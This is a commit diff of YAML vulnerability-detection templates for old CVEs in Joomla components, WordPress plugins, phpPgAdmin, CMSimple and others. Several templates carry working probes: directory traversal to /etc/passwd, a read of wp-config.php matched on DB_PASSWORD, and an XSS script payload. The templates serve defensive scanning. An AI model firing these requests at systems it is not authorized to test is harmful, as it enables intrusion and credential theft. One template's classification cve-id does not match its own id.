is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there
might be relevant real-world environments under which this vulnerability is applicable.'
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
reference:
- https://www.exploit-db.com/exploits/27948
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
- http://www.squirrelmail.org/security/issue/2006-06-01
- http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2006-2842
tags: cve2006,lfi,squirrelmail,cve
cwe-id: CWE-22
tags: cve,cve2006,lfi,squirrelmail,edb
requests:
- method: GET
@ -29,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

11
cves/2007/CVE-2007-0885.yaml
View File

@ -1,12 +1,15 @@
id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
name: Jira Rainbow.Zen - Cross-Site Scripting
author: geeknik
severity: medium
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- https://www.securityfocus.com/archive/1/459590/100/0/threaded
- http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
- https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
- https://nvd.nist.gov/vuln/detail/CVE-2007-0885
classification:
cve-id: CVE-2007-0885
tags: cve,cve2007,jira,xss
@ -30,3 +33,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/12

13
cves/2007/CVE-2007-4504.yaml
View File

@ -1,16 +1,21 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2007-4504
tags: cve,cve2007,joomla,lfi
cwe-id: CWE-22
tags: lfi,edb,cve,cve2007,joomla
requests:
- method: GET
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

3
cves/2007/CVE-2007-4556.yaml
View File

@ -5,11 +5,12 @@ info:
author: pikpikcu
severity: critical
description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
reference:
- https://www.guildhab.top/?p=2326
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
- https://cwiki.apache.org/confluence/display/WW/S2-001
- http://forums.opensymphony.com/ann.jspa?annID=54
classification:
cve-id: CVE-2007-4556
tags: cve,cve2007,apache,rce,struts

12
cves/2007/CVE-2007-5728.yaml
View File

@ -1,17 +1,21 @@
id: CVE-2007-5728
info:
name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
reference:
- https://www.exploit-db.com/exploits/30090
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
- http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
- http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
classification:
cve-id: CVE-2007-5728
metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2007,xss,pgadmin,phppgadmin
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
requests:
- method: GET
@ -33,3 +37,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/12

39
cves/2008/CVE-2008-1059.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2008-1059
info:
name: WordPress Sniplets 1.1.2 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: |
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2008-1061
cwe-id: CWE-22
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29

40
cves/2008/CVE-2008-1061.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2008-1061
info:
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: |
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
- http://secunia.com/advisories/29099
classification:
cve-id: CVE-2008-1061
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

10
cves/2008/CVE-2008-2398.yaml
View File

@ -1,12 +1,16 @@
id: CVE-2008-2398
info:
name: AppServ Open Project 2.5.10 and earlier XSS
name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
author: unstabl3
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
- http://securityreason.com/securityalert/3896
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
classification:
cve-id: CVE-2008-2398
tags: cve,cve2008,xss
@ -30,3 +34,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/12

65
cves/2008/CVE-2008-2650.yaml
View File

@ -1,29 +1,40 @@
id: CVE-2008-2650
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
description: |
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference: https://www.exploit-db.com/exploits/5700
classification:
cve-id: CVE-2008-2650
tags: cve,cve2008,lfi
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
description: |
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference:
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-2650
cwe-id: CWE-22
tags: cve,cve2008,lfi,cmsimple
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

11
cves/2008/CVE-2008-4668.yaml
View File

@ -1,16 +1,19 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
- http://securityreason.com/securityalert/4464
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
classification:
cve-id: CVE-2008-4668
tags: cve,cve2008,joomla,lfi
tags: cve,cve2008,joomla,lfi,edb
requests:
- method: GET
@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

15
cves/2008/CVE-2008-4764.yaml
View File

@ -1,17 +1,22 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in
a show_error action.
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
- https://nvd.nist.gov/vuln/detail/CVE-2008-4764
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-4764
tags: cve,cve2008,joomla,lfi
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
requests:
- method: GET
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

12
cves/2008/CVE-2008-5587.yaml
View File

@ -1,17 +1,21 @@
id: CVE-2008-5587
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
name: phpPgAdmin <=4.2.1 - Local File Inclusion
author: dhiyaneshDK
severity: medium
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
- https://nvd.nist.gov/vuln/detail/CVE-2008-5587
classification:
cve-id: CVE-2008-5587
metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve2008,lfi,phppgadmin
tags: cve,cve2008,lfi,phppgadmin,edb
requests:
- method: GET
@ -28,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22

14
cves/2008/CVE-2008-6080.yaml
View File

@ -1,16 +1,22 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-6080
tags: cve,cve2008,joomla,lfi
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
requests:
- method: GET
@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

4
cves/2008/CVE-2008-6172.yaml
View File

@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
- http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
classification:
cve-id: CVE-2008-6172
tags: cve,cve2008,joomla,lfi
tags: cve2008,joomla,lfi,edb,cve
requests:
- method: GET

14
cves/2008/CVE-2008-6222.yaml
View File

@ -1,16 +1,22 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-6222
tags: cve,cve2008,joomla,lfi
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
requests:
- method: GET
@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

21
cves/2008/CVE-2008-6668.yaml
View File

@ -1,16 +1,21 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
name: nweb2fax <=0.2.7 - Local File Inclusion
author: geeknik
severity: high
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-6668
tags: nweb2fax,lfi,cve,cve2008,traversal
cwe-id: CWE-22
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
requests:
- method: GET
@ -20,10 +25,14 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

4
cves/2009/CVE-2009-0545.yaml
View File

@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/8023
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
classification:
cve-id: CVE-2009-0545
tags: cve,cve2009,zeroshell,kerbynet,rce
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET

13
cves/2009/CVE-2009-0932.yaml
View File

@ -1,16 +1,21 @@
id: CVE-2009-0932
info:
name: Horde - Horde_Image::factory driver Argument LFI
name: Horde/Horde Groupware - Local File Inclusion
author: pikpikcu
severity: high
description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
- http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-0932
tags: cve,cve2009,horde,lfi,traversal
cwe-id: CWE-22
tags: cve,cve2009,horde,lfi,traversal,edb
requests:
- method: GET
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

16
cves/2009/CVE-2009-1151.yaml
View File

@ -1,16 +1,22 @@
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
tags: cve,cve2009,phpmyadmin,rce,deserialization
cwe-id: CWE-77
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
requests:
- raw:
@ -32,3 +38,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/07/06

15
cves/2009/CVE-2009-1496.yaml
View File

@ -1,16 +1,21 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
description: |
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-1496
tags: cve,cve2009,joomla,lfi
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

15
cves/2009/CVE-2009-1558.yaml
View File

@ -1,15 +1,22 @@
id: CVE-2009-1558
info:
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference:
- https://www.exploit-db.com/exploits/32954
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
- http://www.vupen.com/english/advisories/2009/1173
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1558
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-1558
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
cwe-id: CWE-22
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
requests:
- method: GET
@ -25,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

15
cves/2009/CVE-2009-1872.yaml
View File

@ -1,19 +1,22 @@
id: CVE-2009-1872
info:
name: Adobe Coldfusion 8 linked XSS vulnerabilies
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
author: princechaddha
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
classification:
cve-id: CVE-2009-1872
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2009,adobe,xss,coldfusion
verified: "true"
tags: cve,cve2009,adobe,xss,coldfusion,tenable
requests:
- method: GET
@ -35,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12

14
cves/2009/CVE-2009-2015.yaml
View File

@ -1,16 +1,22 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
name: Joomla! MooFAQ 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
- http://www.vupen.com/english/advisories/2009/1530
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-2015
tags: cve,cve2009,joomla,lfi
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

14
cves/2009/CVE-2009-2100.yaml
View File

@ -1,16 +1,22 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-2100
tags: cve,cve2009,joomla,lfi
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
requests:
- method: GET
@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

14
cves/2009/CVE-2009-3053.yaml
View File

@ -1,16 +1,22 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
